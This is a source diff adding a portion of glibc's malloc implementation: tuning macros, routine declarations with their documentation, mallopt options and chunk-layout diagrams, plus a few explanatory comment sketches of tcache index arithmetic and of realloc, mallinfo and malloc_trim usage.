+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
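+
+/*
+  Worked example of the mapping above, assuming the usual 64-bit
+  defaults (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, MINSIZE == 32):
+
+    tidx2usize (0)    == 0 * 16 + 32 - 8 == 24   (largest user size in idx 0)
+    request2size (24) == 32,  csize2tidx (32) == (32 - 32 + 15) / 16 == 0
+    request2size (25) == 48,  csize2tidx (48) == (48 - 32 + 15) / 16 == 1
+
+  which matches the "idx 0 bytes 0..24, idx 1 bytes 25..40" table above.
+*/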
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, because this malloc
+  returns a unique pointer for malloc(0), realloc(p, 0) does as well.
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
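+
+/*
+  A minimal caller-side sketch of the "p is NOT freed on failure" rule
+  above; growing to 2 * n and the helper name grow are arbitrary.
+
+    #include <stdlib.h>
+
+    static void *grow (void *p, size_t n)
+    {
+      void *q = realloc (p, 2 * n);
+      if (q == NULL)       // on failure p is still valid and must be freed
+        {
+          free (p);
+          return NULL;
+        }
+      return q;            // may or may not be the same address as p
+    }
+*/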
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
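+
+/*
+  A minimal caller-side sketch reading a few of the fields described
+  above; the 1000-byte allocation is arbitrary.
+
+    #include <malloc.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *p = malloc (1000);
+      struct mallinfo mi = mallinfo ();
+      printf ("arena=%d uordblks=%d fordblks=%d keepcost=%d\n",
+              mi.arena, mi.uordblks, mi.fordblks, mi.keepcost);
+      free (p);
+      return 0;
+    }
+*/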
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
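+
+/*
+  A minimal caller-side sketch of the pattern described above: free a
+  batch of heap blocks, then ask for trailing space back while keeping
+  (an arbitrary) 64K of padding.  The helper name release_unused and
+  the block sizes are purely illustrative.
+
+    #include <malloc.h>
+    #include <stdlib.h>
+
+    static void release_unused (void)
+    {
+      void *blocks[256];
+      for (int i = 0; i < 256; i++)     // grow the main arena via sbrk
+        blocks[i] = malloc (4096);
+      for (int i = 0; i < 256; i++)
+        free (blocks[i]);
+      int released = malloc_trim (64 * 1024);  // 1 if pages went back to the OS
+      (void) released;
+    }
+*/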
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements.
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
